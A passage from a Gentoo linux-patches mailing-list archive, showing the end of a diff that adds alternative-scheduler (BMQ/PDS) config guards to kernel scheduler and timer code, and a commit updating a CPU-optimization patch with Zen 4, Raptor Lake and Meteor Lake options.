+diff --git a/kernel/sched/pelt.c b/kernel/sched/pelt.c
+index 0f310768260c..bd38bf738fe9 100644
+--- a/kernel/sched/pelt.c
++++ b/kernel/sched/pelt.c
+@@ -266,6 +266,7 @@ ___update_load_avg(struct sched_avg *sa, unsigned long load)
+ 	WRITE_ONCE(sa->util_avg, sa->util_sum / divider);
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * sched_entity:
+  *
+@@ -383,8 +384,9 @@ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
+ 
+ 	return 0;
+ }
++#endif
+ 
+-#ifdef CONFIG_SCHED_THERMAL_PRESSURE
++#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
+ /*
+  * thermal:
+  *
+diff --git a/kernel/sched/pelt.h b/kernel/sched/pelt.h
+index 3a0e0dc28721..e8a7d84aa5a5 100644
+--- a/kernel/sched/pelt.h
++++ b/kernel/sched/pelt.h
+@@ -1,13 +1,15 @@
+ #ifdef CONFIG_SMP
+ #include "sched-pelt.h"
+ 
++#ifndef CONFIG_SCHED_ALT
+ int __update_load_avg_blocked_se(u64 now, struct sched_entity *se);
+ int __update_load_avg_se(u64 now, struct cfs_rq *cfs_rq, struct sched_entity *se);
+ int __update_load_avg_cfs_rq(u64 now, struct cfs_rq *cfs_rq);
+ int update_rt_rq_load_avg(u64 now, struct rq *rq, int running);
+ int update_dl_rq_load_avg(u64 now, struct rq *rq, int running);
++#endif
+ 
+-#ifdef CONFIG_SCHED_THERMAL_PRESSURE
++#if defined(CONFIG_SCHED_THERMAL_PRESSURE) && !defined(CONFIG_SCHED_ALT)
+ int update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity);
+ 
+ static inline u64 thermal_load_avg(struct rq *rq)
+@@ -44,6 +46,7 @@ static inline u32 get_pelt_divider(struct sched_avg *avg)
+ 	return PELT_MIN_DIVIDER + avg->period_contrib;
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ static inline void cfs_se_util_change(struct sched_avg *avg)
+ {
+ 	unsigned int enqueued;
+@@ -180,9 +183,11 @@ static inline u64 cfs_rq_clock_pelt(struct cfs_rq *cfs_rq)
+ 	return rq_clock_pelt(rq_of(cfs_rq));
+ }
+ #endif
++#endif /* CONFIG_SCHED_ALT */
+ 
+ #else
+ 
++#ifndef CONFIG_SCHED_ALT
+ static inline int
+ update_cfs_rq_load_avg(u64 now, struct cfs_rq *cfs_rq)
+ {
+@@ -200,6 +205,7 @@ update_dl_rq_load_avg(u64 now, struct rq *rq, int running)
+ {
+ 	return 0;
+ }
++#endif
+ 
+ static inline int
+ update_thermal_load_avg(u64 now, struct rq *rq, u64 capacity)
+diff --git a/kernel/sched/sched.h b/kernel/sched/sched.h
+index a4a20046e586..c363693cd869 100644
+--- a/kernel/sched/sched.h
++++ b/kernel/sched/sched.h
+@@ -5,6 +5,10 @@
+ #ifndef _KERNEL_SCHED_SCHED_H
+ #define _KERNEL_SCHED_SCHED_H
+ 
++#ifdef CONFIG_SCHED_ALT
++#include "alt_sched.h"
++#else
++
+ #include <linux/sched/affinity.h>
+ #include <linux/sched/autogroup.h>
+ #include <linux/sched/cpufreq.h>
+@@ -3183,4 +3187,9 @@ static inline void update_current_exec_runtime(struct task_struct *curr,
+ 	cgroup_account_cputime(curr, delta_exec);
+ }
+ 
++static inline int task_running_nice(struct task_struct *p)
++{
++	return (task_nice(p) > 0);
++}
++#endif /* !CONFIG_SCHED_ALT */
+ #endif /* _KERNEL_SCHED_SCHED_H */
+diff --git a/kernel/sched/stats.c b/kernel/sched/stats.c
+index 857f837f52cb..5486c63e4790 100644
+--- a/kernel/sched/stats.c
++++ b/kernel/sched/stats.c
+@@ -125,8 +125,10 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 	} else {
+ 		struct rq *rq;
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 		struct sched_domain *sd;
+ 		int dcount = 0;
++#endif
+ #endif
+ 		cpu = (unsigned long)(v - 2);
+ 		rq = cpu_rq(cpu);
+@@ -143,6 +145,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 		seq_printf(seq, "\n");
+ 
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ 		/* domain-specific stats */
+ 		rcu_read_lock();
+ 		for_each_domain(cpu, sd) {
+@@ -171,6 +174,7 @@ static int show_schedstat(struct seq_file *seq, void *v)
+ 			    sd->ttwu_move_balance);
+ 		}
+ 		rcu_read_unlock();
++#endif
+ #endif
+ 	}
+ 	return 0;
+diff --git a/kernel/sched/stats.h b/kernel/sched/stats.h
+index 84a188913cc9..53934e7ef5db 100644
+--- a/kernel/sched/stats.h
++++ b/kernel/sched/stats.h
+@@ -89,6 +89,7 @@ static inline void rq_sched_info_depart  (struct rq *rq, unsigned long long delt
+ 
+ #endif /* CONFIG_SCHEDSTATS */
+ 
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_FAIR_GROUP_SCHED
+ struct sched_entity_stats {
+ 	struct sched_entity     se;
+@@ -105,6 +106,7 @@ __schedstats_from_se(struct sched_entity *se)
+ #endif
+ 	return &task_of(se)->stats;
+ }
++#endif /* CONFIG_SCHED_ALT */
+ 
+ #ifdef CONFIG_PSI
+ void psi_task_change(struct task_struct *task, int clear, int set);
+diff --git a/kernel/sched/topology.c b/kernel/sched/topology.c
+index 8739c2a5a54e..d8dd6c15eb47 100644
+--- a/kernel/sched/topology.c
++++ b/kernel/sched/topology.c
+@@ -3,6 +3,7 @@
+  * Scheduler topology setup/handling methods
+  */
+ 
++#ifndef CONFIG_SCHED_ALT
+ DEFINE_MUTEX(sched_domains_mutex);
+ 
+ /* Protected by sched_domains_mutex: */
+@@ -1413,8 +1414,10 @@ static void asym_cpu_capacity_scan(void)
+  */
+ 
+ static int default_relax_domain_level = -1;
++#endif /* CONFIG_SCHED_ALT */
+ int sched_domain_level_max;
+ 
++#ifndef CONFIG_SCHED_ALT
+ static int __init setup_relax_domain_level(char *str)
+ {
+ 	if (kstrtoint(str, 0, &default_relax_domain_level))
+@@ -1647,6 +1650,7 @@ sd_init(struct sched_domain_topology_level *tl,
+ 
+ 	return sd;
+ }
++#endif /* CONFIG_SCHED_ALT */
+ 
+ /*
+  * Topology list, bottom-up.
+@@ -1683,6 +1687,7 @@ void set_sched_topology(struct sched_domain_topology_level *tl)
+ 	sched_domain_topology_saved = NULL;
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_NUMA
+ 
+ static const struct cpumask *sd_numa_mask(int cpu)
+@@ -2645,3 +2650,15 @@ void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
+ 	partition_sched_domains_locked(ndoms_new, doms_new, dattr_new);
+ 	mutex_unlock(&sched_domains_mutex);
+ }
++#else /* CONFIG_SCHED_ALT */
++void partition_sched_domains(int ndoms_new, cpumask_var_t doms_new[],
++			     struct sched_domain_attr *dattr_new)
++{}
++
++#ifdef CONFIG_NUMA
++int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
++{
++	return best_mask_cpu(cpu, cpus);
++}
++#endif /* CONFIG_NUMA */
++#endif
+diff --git a/kernel/sysctl.c b/kernel/sysctl.c
+index c6d9dec11b74..2bc42ce8b48e 100644
+--- a/kernel/sysctl.c
++++ b/kernel/sysctl.c
+@@ -93,6 +93,10 @@ EXPORT_SYMBOL_GPL(sysctl_long_vals);
+ 
+ /* Constants used for minimum and maximum */
+ 
++#ifdef CONFIG_SCHED_ALT
++extern int sched_yield_type;
++#endif
++
+ #ifdef CONFIG_PERF_EVENTS
+ static const int six_hundred_forty_kb = 640 * 1024;
+ #endif
+@@ -1633,6 +1637,7 @@ int proc_do_static_key(struct ctl_table *table, int write,
+ }
+ 
+ static struct ctl_table kern_table[] = {
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_NUMA_BALANCING
+ 	{
+ 		.procname	= "numa_balancing",
+@@ -1652,6 +1657,7 @@ static struct ctl_table kern_table[] = {
+ 		.extra1		= SYSCTL_ZERO,
+ 	},
+ #endif /* CONFIG_NUMA_BALANCING */
++#endif /* !CONFIG_SCHED_ALT */
+ 	{
+ 		.procname	= "panic",
+ 		.data		= &panic_timeout,
+@@ -1953,6 +1959,17 @@ static struct ctl_table kern_table[] = {
+ 		.proc_handler	= proc_dointvec,
+ 	},
+ #endif
++#ifdef CONFIG_SCHED_ALT
++	{
++		.procname	= "yield_type",
++		.data		= &sched_yield_type,
++		.maxlen		= sizeof (int),
++		.mode		= 0644,
++		.proc_handler	= &proc_dointvec_minmax,
++		.extra1		= SYSCTL_ZERO,
++		.extra2		= SYSCTL_TWO,
++	},
++#endif
+ #if defined(CONFIG_S390) && defined(CONFIG_SMP)
+ 	{
+ 		.procname	= "spin_retry",
+diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
+index 3ae661ab6260..35f0176dcdb0 100644
+--- a/kernel/time/hrtimer.c
++++ b/kernel/time/hrtimer.c
+@@ -2088,8 +2088,10 @@ long hrtimer_nanosleep(ktime_t rqtp, const enum hrtimer_mode mode,
+ 	int ret = 0;
+ 	u64 slack;
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	slack = current->timer_slack_ns;
+ 	if (dl_task(current) || rt_task(current))
++#endif
+ 		slack = 0;
+ 
+ 	hrtimer_init_sleeper_on_stack(&t, clockid, mode);
+diff --git a/kernel/time/posix-cpu-timers.c b/kernel/time/posix-cpu-timers.c
+index cb925e8ef9a8..67d823510f5c 100644
+--- a/kernel/time/posix-cpu-timers.c
++++ b/kernel/time/posix-cpu-timers.c
+@@ -223,7 +223,7 @@ static void task_sample_cputime(struct task_struct *p, u64 *samples)
+ 	u64 stime, utime;
+ 
+ 	task_cputime(p, &utime, &stime);
+-	store_samples(samples, stime, utime, p->se.sum_exec_runtime);
++	store_samples(samples, stime, utime, tsk_seruntime(p));
+ }
+ 
+ static void proc_sample_cputime_atomic(struct task_cputime_atomic *at,
+@@ -866,6 +866,7 @@ static void collect_posix_cputimers(struct posix_cputimers *pct, u64 *samples,
+ 	}
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ static inline void check_dl_overrun(struct task_struct *tsk)
+ {
+ 	if (tsk->dl.dl_overrun) {
+@@ -873,6 +874,7 @@ static inline void check_dl_overrun(struct task_struct *tsk)
+ 		send_signal_locked(SIGXCPU, SEND_SIG_PRIV, tsk, PIDTYPE_TGID);
+ 	}
+ }
++#endif
+ 
+ static bool check_rlimit(u64 time, u64 limit, int signo, bool rt, bool hard)
+ {
+@@ -900,8 +902,10 @@ static void check_thread_timers(struct task_struct *tsk,
+ 	u64 samples[CPUCLOCK_MAX];
+ 	unsigned long soft;
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	if (dl_task(tsk))
+ 		check_dl_overrun(tsk);
++#endif
+ 
+ 	if (expiry_cache_is_inactive(pct))
+ 		return;
+@@ -915,7 +919,7 @@ static void check_thread_timers(struct task_struct *tsk,
+ 	soft = task_rlimit(tsk, RLIMIT_RTTIME);
+ 	if (soft != RLIM_INFINITY) {
+ 		/* Task RT timeout is accounted in jiffies. RTTIME is usec */
+-		unsigned long rttime = tsk->rt.timeout * (USEC_PER_SEC / HZ);
++		unsigned long rttime = tsk_rttimeout(tsk) * (USEC_PER_SEC / HZ);
+ 		unsigned long hard = task_rlimit_max(tsk, RLIMIT_RTTIME);
+ 
+ 		/* At the hard limit, send SIGKILL. No further action. */
+@@ -1151,8 +1155,10 @@ static inline bool fastpath_timer_check(struct task_struct *tsk)
+ 			return true;
+ 	}
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	if (dl_task(tsk) && tsk->dl.dl_overrun)
+ 		return true;
++#endif
+ 
+ 	return false;
+ }
+diff --git a/kernel/trace/trace_selftest.c b/kernel/trace/trace_selftest.c
+index a2d301f58ced..2ccdede8585c 100644
+--- a/kernel/trace/trace_selftest.c
++++ b/kernel/trace/trace_selftest.c
+@@ -1143,10 +1143,15 @@ static int trace_wakeup_test_thread(void *data)
+ {
+ 	/* Make this a -deadline thread */
+ 	static const struct sched_attr attr = {
++#ifdef CONFIG_SCHED_ALT
++		/* No deadline on BMQ/PDS, use RR */
++		.sched_policy = SCHED_RR,
++#else
+ 		.sched_policy = SCHED_DEADLINE,
+ 		.sched_runtime = 100000ULL,
+ 		.sched_deadline = 10000000ULL,
+ 		.sched_period = 10000000ULL
++#endif
+ 	};
+ 	struct wakeup_test_data *x = data;
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2022-12-16 19:44 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2022-12-16 19:44 UTC (permalink / raw
  To: gentoo-commits

commit:     13932c5603ee74cb23015e86fe92af652c8cad09
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Dec 16 19:43:32 2022 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Dec 16 19:43:32 2022 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=13932c56

Update CPU optimization patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 5010_enable-cpu-optimizations-universal.patch | 217 +++++++++++++++++++-------
 1 file changed, 159 insertions(+), 58 deletions(-)

diff --git a/5010_enable-cpu-optimizations-universal.patch b/5010_enable-cpu-optimizations-universal.patch
index b9c03cb6..0841340b 100644
--- a/5010_enable-cpu-optimizations-universal.patch
+++ b/5010_enable-cpu-optimizations-universal.patch
@@ -1,10 +1,7 @@
-From b5892719c43f739343c628e3d357471a3bdaa368 Mon Sep 17 00:00:00 2001
-From: graysky <graysky@archlinux.us>
-Date: Tue, 15 Mar 2022 05:58:43 -0400
+From a0825feea3f100656d58446885b5f190284fd219
+From: graysky <therealgraysky@proton.me>
+Date: Fri, 4 Nov 2022 15:34:36 -0400
 Subject: [PATCH] more uarches for kernel 5.17+
-MIME-Version: 1.0
-Content-Type: text/plain; charset=UTF-8
-Content-Transfer-Encoding: 8bit
 
 FEATURES
 This patch adds additional CPU options to the Linux kernel accessible under:
@@ -36,6 +33,7 @@ CPU-specific microarchitectures include:
 • AMD Family 17h (Zen)
 • AMD Family 17h (Zen 2)
 • AMD Family 19h (Zen 3)†
+• AMD Family 19h (Zen 4)§
 • Intel Silvermont low-power processors
 • Intel Goldmont low-power processors (Apollo Lake and Denverton)
 • Intel Goldmont Plus low-power processors (Gemini Lake)
@@ -55,11 +53,14 @@ CPU-specific microarchitectures include:
 • Intel 3rd Gen 10nm++ Xeon (Sapphire Rapids)‡
 • Intel 11th Gen i3/i5/i7/i9-family (Rocket Lake)‡
 • Intel 12th Gen i3/i5/i7/i9-family (Alder Lake)‡
+• Intel 13th Gen i3/i5/i7/i9-family (Raptor Lake)§
+• Intel 14th Gen i3/i5/i7/i9-family (Meteor Lake)§
 
 Notes: If not otherwise noted, gcc >=9.1 is required for support.
        *Requires gcc >=10.1 or clang >=10.0
        †Required gcc >=10.3 or clang >=12.0
        ‡Required gcc >=11.1 or clang >=12.0
+       §Required gcc >=13.0 or clang >=15.0.5
 
 It also offers to compile passing the 'native' option which, "selects the CPU
 to generate code for at compilation time by determining the processor type of
@@ -99,20 +100,19 @@ REFERENCES
 4.  https://github.com/graysky2/kernel_gcc_patch/issues/15
 5.  http://www.linuxforge.net/docs/linux/linux-gcc.php
 
-Signed-off-by: graysky <graysky@archlinux.us>
 ---
- arch/x86/Kconfig.cpu            | 332 ++++++++++++++++++++++++++++++--
- arch/x86/Makefile               |  40 +++-
- arch/x86/include/asm/vermagic.h |  66 +++++++
- 3 files changed, 424 insertions(+), 14 deletions(-)
+ arch/x86/Kconfig.cpu            | 416 ++++++++++++++++++++++++++++++--
+ arch/x86/Makefile               |  43 +++-
+ arch/x86/include/asm/vermagic.h |  72 ++++++
+ 3 files changed, 514 insertions(+), 17 deletions(-)
 
 diff --git a/arch/x86/Kconfig.cpu b/arch/x86/Kconfig.cpu
-index 542377cd419d..22b919cdb6d1 100644
+index 542377cd419d..08d887d1220d 100644
 --- a/arch/x86/Kconfig.cpu
 +++ b/arch/x86/Kconfig.cpu
 @@ -157,7 +157,7 @@ config MPENTIUM4
- 
- 
+
+
  config MK6
 -	bool "K6/K6-II/K6-III"
 +	bool "AMD K6/K6-II/K6-III"
@@ -121,16 +121,16 @@ index 542377cd419d..22b919cdb6d1 100644
  	  Select this for an AMD K6-family processor.  Enables use of
 @@ -165,7 +165,7 @@ config MK6
  	  flags to GCC.
- 
+
  config MK7
 -	bool "Athlon/Duron/K7"
 +	bool "AMD Athlon/Duron/K7"
  	depends on X86_32
  	help
  	  Select this for an AMD Athlon K7-family processor.  Enables use of
-@@ -173,12 +173,98 @@ config MK7
+@@ -173,12 +173,106 @@ config MK7
  	  flags to GCC.
- 
+
  config MK8
 -	bool "Opteron/Athlon64/Hammer/K8"
 +	bool "AMD Opteron/Athlon64/Hammer/K8"
@@ -138,7 +138,7 @@ index 542377cd419d..22b919cdb6d1 100644
  	  Select this for an AMD Opteron or Athlon64 Hammer-family processor.
  	  Enables use of some extended instructions, and passes appropriate
  	  optimization flags to GCC.
- 
+
 +config MK8SSE3
 +	bool "AMD Opteron/Athlon64/Hammer/K8 with SSE3"
 +	help
@@ -224,32 +224,40 @@ index 542377cd419d..22b919cdb6d1 100644
 +	  Select this for AMD Family 19h Zen 3 processors.
 +
 +	  Enables -march=znver3
++
++config MZEN4
++	bool "AMD Zen 4"
++	depends on (CC_IS_GCC && GCC_VERSION >= 130000) || (CC_IS_CLANG && CLANG_VERSION >= 150500)
++	help
++	  Select this for AMD Family 19h Zen 4 processors.
++
++	  Enables -march=znver4
 +
  config MCRUSOE
  	bool "Crusoe"
  	depends on X86_32
-@@ -270,7 +356,7 @@ config MPSC
+@@ -270,7 +364,7 @@ config MPSC
  	  in /proc/cpuinfo. Family 15 is an older Xeon, Family 6 a newer one.
- 
+
  config MCORE2
 -	bool "Core 2/newer Xeon"
 +	bool "Intel Core 2"
  	help
- 
+
  	  Select this for Intel Core 2 and newer Core 2 Xeons (Xeon 51xx and
-@@ -278,6 +364,8 @@ config MCORE2
+@@ -278,6 +372,8 @@ config MCORE2
  	  family in /proc/cpuinfo. Newer ones have 6 and older ones 15
  	  (not a typo)
- 
+
 +	  Enables -march=core2
 +
  config MATOM
  	bool "Intel Atom"
  	help
-@@ -287,6 +375,182 @@ config MATOM
+@@ -287,6 +383,202 @@ config MATOM
  	  accordingly optimized code. Use a recent GCC with specific Atom
  	  support in order to fully benefit from selecting this option.
- 
+
 +config MNEHALEM
 +	bool "Intel Nehalem"
 +	select X86_P6_NOP
@@ -425,14 +433,34 @@ index 542377cd419d..22b919cdb6d1 100644
 +	  Select this for twelfth-generation processors in the Alder Lake family.
 +
 +	  Enables -march=alderlake
++
++config MRAPTORLAKE
++	bool "Intel Raptor Lake"
++	depends on (CC_IS_GCC && GCC_VERSION >= 130000) || (CC_IS_CLANG && CLANG_VERSION >= 150500)
++	select X86_P6_NOP
++	help
++
++	  Select this for thirteenth-generation processors in the Raptor Lake family.
++
++	  Enables -march=raptorlake
++
++config MMETEORLAKE
++	bool "Intel Meteor Lake"
++	depends on (CC_IS_GCC && GCC_VERSION >= 130000) || (CC_IS_CLANG && CLANG_VERSION >= 150500)
++	select X86_P6_NOP
++	help
++
++	  Select this for fourteenth-generation processors in the Meteor Lake family.
++
++	  Enables -march=meteorlake
 +
  config GENERIC_CPU
  	bool "Generic-x86-64"
  	depends on X86_64
-@@ -294,6 +558,50 @@ config GENERIC_CPU
+@@ -294,6 +586,50 @@ config GENERIC_CPU
  	  Generic x86-64 CPU.
  	  Run equally well on all x86-64 CPUs.
- 
+
 +config GENERIC_CPU2
 +	bool "Generic-x86-64-v2"
 +	depends on (CC_IS_GCC && GCC_VERSION > 110000) || (CC_IS_CLANG && CLANG_VERSION >= 120000)
@@ -478,68 +506,133 @@ index 542377cd419d..22b919cdb6d1 100644
 +	  Enables -march=native
 +
  endchoice
- 
+
  config X86_GENERIC
-@@ -318,7 +626,7 @@ config X86_INTERNODE_CACHE_SHIFT
+@@ -318,9 +654,17 @@ config X86_INTERNODE_CACHE_SHIFT
  config X86_L1_CACHE_SHIFT
  	int
  	default "7" if MPENTIUM4 || MPSC
 -	default "6" if MK7 || MK8 || MPENTIUMM || MCORE2 || MATOM || MVIAC7 || X86_GENERIC || GENERIC_CPU
-+	default "6" if MK7 || MK8 || MPENTIUMM || MCORE2 || MATOM || MVIAC7 || MK8SSE3 || MK10 || MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MNATIVE_INTEL || MNATIVE_AMD || X86_GENERIC || GENERIC_CPU || GENERIC_CPU2 || GENERIC_CPU3 || GENERIC_CPU4
++	default "6" if MK7 || MK8 || MPENTIUMM || MCORE2 || MATOM || MVIAC7 || MK8SSE3 || MK10 \
++	|| MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER \
++	|| MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MZEN4 || MNEHALEM || MWESTMERE || MSILVERMONT \
++	|| MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL \
++	|| MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE \
++	|| MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE \
++	|| MNATIVE_INTEL || MNATIVE_AMD || X86_GENERIC || GENERIC_CPU || GENERIC_CPU2 || GENERIC_CPU3 \
++	|| GENERIC_CPU4
  	default "4" if MELAN || M486SX || M486 || MGEODEGX1
- 	default "5" if MWINCHIP3D || MWINCHIPC6 || MCRUSOE || MEFFICEON || MCYRIXIII || MK6 || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || M586 || MVIAC3_2 || MGEODE_LX
- 
-@@ -336,11 +644,11 @@ config X86_ALIGNMENT_16
- 
+-	default "5" if MWINCHIP3D || MWINCHIPC6 || MCRUSOE || MEFFICEON || MCYRIXIII || MK6 || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || M586 || MVIAC3_2 || MGEODE_LX
++	default "5" if MWINCHIP3D || MWINCHIPC6 || MCRUSOE || MEFFICEON || MCYRIXIII || MK6 || MPENTIUMIII \
++	|| MPENTIUMII || M686 || M586MMX || M586TSC || M586 || MVIAC3_2 || MGEODE_LX
+
+ config X86_F00F_BUG
+ 	def_bool y
+@@ -332,15 +676,27 @@ config X86_INVD_BUG
+
+ config X86_ALIGNMENT_16
+ 	def_bool y
+-	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MELAN || MK6 || M586MMX || M586TSC || M586 || M486SX || M486 || MVIAC3_2 || MGEODEGX1
++	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MELAN || MK6 || M586MMX || M586TSC \
++	|| M586 || M486SX || M486 || MVIAC3_2 || MGEODEGX1
+
  config X86_INTEL_USERCOPY
  	def_bool y
 -	depends on MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M586MMX || X86_GENERIC || MK8 || MK7 || MEFFICEON || MCORE2
-+	depends on MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M586MMX || X86_GENERIC || MK8 || MK7 || MEFFICEON || MCORE2 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MNATIVE_INTEL
- 
++	depends on MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M586MMX || X86_GENERIC \
++	|| MK8 || MK7 || MEFFICEON || MCORE2 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT \
++	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX \
++	|| MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS \
++	|| MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL
+
  config X86_USE_PPRO_CHECKSUM
  	def_bool y
 -	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MK8 || MVIAC3_2 || MVIAC7 || MEFFICEON || MGEODE_LX || MCORE2 || MATOM
-+	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || MK8 || MVIAC3_2 || MVIAC7 || MEFFICEON || MGEODE_LX || MCORE2 || MATOM || MK8SSE3 || MK10 || MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER || MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MNATIVE_INTEL || MNATIVE_AMD
- 
++	depends on MWINCHIP3D || MWINCHIPC6 || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM \
++	|| MPENTIUMIII || MPENTIUMII || M686 || MK8 || MVIAC3_2 || MVIAC7 || MEFFICEON || MGEODE_LX \
++	|| MCORE2 || MATOM || MK8SSE3 || MK10 || MBARCELONA || MBOBCAT || MJAGUAR || MBULLDOZER \
++	|| MPILEDRIVER || MSTEAMROLLER || MEXCAVATOR || MZEN || MZEN2 || MZEN3 || MZEN4 || MNEHALEM \
++	|| MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE \
++	|| MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE \
++	|| MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE \
++	|| MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL || MNATIVE_AMD
+
  #
  # P6_NOPs are a relatively minor optimization that require a family >=
-@@ -356,26 +664,26 @@ config X86_USE_PPRO_CHECKSUM
+@@ -356,32 +712,62 @@ config X86_USE_PPRO_CHECKSUM
  config X86_P6_NOP
  	def_bool y
  	depends on X86_64
 -	depends on (MCORE2 || MPENTIUM4 || MPSC)
-+	depends on (MCORE2 || MPENTIUM4 || MPSC || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT || MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE || MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE || MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MNATIVE_INTEL)
- 
++	depends on (MCORE2 || MPENTIUM4 || MPSC || MNEHALEM || MWESTMERE || MSILVERMONT || MGOLDMONT \
++	|| MGOLDMONTPLUS || MSANDYBRIDGE || MIVYBRIDGE || MHASWELL || MBROADWELL || MSKYLAKE \
++	|| MSKYLAKEX || MCANNONLAKE || MICELAKE || MCASCADELAKE || MCOOPERLAKE || MTIGERLAKE \
++	|| MSAPPHIRERAPIDS || MROCKETLAKE || MALDERLAKE || MRAPTORLAKE || MMETEORLAKE || MNATIVE_INTEL)
+
  config X86_TSC
  	def_bool y
 -	depends on (MWINCHIP3D || MCRUSOE || MEFFICEON || MCYRIXIII || MK7 || MK6 || MPENTIUM4 || MPENTIUMM || MPENTIUMIII || MPENTIUMII || M686 || M586MMX || M586TSC || MK8 || MVIAC3_2 || MVIAC7 || MGEODEGX1 || MGEODE_LX || MCORE2 || MATOM) || X86_64
